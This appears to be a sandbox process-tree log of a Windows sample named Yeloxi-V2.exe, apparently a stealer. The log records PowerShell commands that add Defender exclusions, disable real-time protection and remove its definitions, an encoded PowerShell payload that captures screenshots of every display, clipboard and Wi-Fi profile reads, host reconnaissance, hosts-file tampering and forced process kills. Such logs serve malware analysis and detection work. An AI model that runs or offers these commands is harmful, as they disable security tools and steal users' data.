C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6196 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7744 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7932 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7896 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7892 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6524 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8260 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:12⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004E4 0x00000000000004F01⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\Downloads\Yeloxi-V2\Yeloxi-V2.exe"C:\Users\Admin\Downloads\Yeloxi-V2\Yeloxi-V2.exe"1⤵
-
C:\Users\Admin\Downloads\Yeloxi-V2\Yeloxi-V2.exe"C:\Users\Admin\Downloads\Yeloxi-V2\Yeloxi-V2.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Yeloxi-V2\Yeloxi-V2.exe'"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Yeloxi-V2\Yeloxi-V2.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('404', 0, 'Error', 0+16);close()""3⤵
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('404', 0, 'Error', 0+16);close()"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Downloads\Yeloxi-V2\Yeloxi-V2.exe""3⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\Downloads\Yeloxi-V2\Yeloxi-V2.exe"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‌  .scr'"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‌  .scr'4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
-
C:\Windows\system32\tree.comtree /A /F4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
-
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tec5gjnb\tec5gjnb.cmdline"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2735.tmp" "c:\Users\Admin\AppData\Local\Temp\tec5gjnb\CSC9A30CDC2855944B19FB6E789BBD084DC.TMP"6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
-
C:\Windows\system32\tree.comtree /A /F4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
-
C:\Windows\system32\tree.comtree /A /F4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\tree.comtree /A /F4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
-
C:\Windows\system32\tree.comtree /A /F4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
-
C:\Windows\system32\tree.comtree /A /F4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3860"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 38604⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 232"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 2324⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3860"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 38604⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1800"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 18004⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 232"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 2324⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1636"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 16364⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1800"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 18004⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 784"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 7844⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1636"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 16364⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1452"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 14524⤵
- Kills process with taskkill
-
